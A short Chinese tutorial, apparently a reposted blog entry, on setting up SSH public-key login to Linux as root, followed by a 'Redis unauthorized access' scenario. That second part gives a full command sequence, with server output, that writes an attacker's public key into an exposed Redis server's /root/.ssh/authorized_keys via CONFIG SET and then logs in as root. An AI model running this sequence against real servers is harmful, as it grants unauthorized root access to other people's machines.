使用密鑰認證機制遠程登錄Linux
阿新 • • 發佈:2019-01-22
修改 keygen 認證 新建 red auth shell 創建文件 內容
密鑰認證機制
創建存放key的文件
1)創建目錄 /root/.ssh 並設置權限
[root@localhost ~]# mkdir /root/.ssh mkdir 命令用來創建目錄,以後會詳細介紹,暫時只了解即可。
[root@localhost ~]# chmod 700 /root/.ssh chmod 命令是用來修改文件屬性權限的,以後會詳細介紹。
2)創建文件 / root/.ssh/authorized_keys
[root@localhost ~]# vim /root/.ssh/authorized_keys
生成Key
Xshell-【新建用戶密鑰生成向導】,密鑰類型選擇RSA,密鑰長度選擇2048位,生成密鑰名稱,加密的密碼。
復制生成的公鑰到遠程linux裏面 /root/.ssh/authorized_keys 文件中。如果沒有.ssh目錄,就自行建立,並更改目錄權限為700。粘貼公鑰的內容,保存退出。
就可以利用密鑰登錄了
漏洞場景-redis未授權訪問漏洞
1)本地生成秘鑰 root@XXX:~# ssh-keygen -t rsa 2)將公鑰寫入一個文件 root@XXX:~# cd /root/.ssh/ root@XXX:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt 3)連接redis寫入文件 root@XXX:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit OK root@XXX:~/.ssh# redis-cli -h 210.73.90.xxx 210.73.90.xxx:6379> config set dir /root/.ssh/ OK (1.39s) 210.73.90.xxx:6379> CONFIG GET dir 1) "dir" 2) "/root/.ssh" 210.73.90.xxx:6379> config set dbfilename "authorized_keys" OK (1.03s) 210.73.90.xxx:6379> SAVE OK 210.73.90.xxx:6379> exit root@XXX:~/.ssh# ssh 4)連接服務器 root@XXX:~/.ssh# ssh -i id_rsa [email protected]
使用密鑰認證機制遠程登錄Linux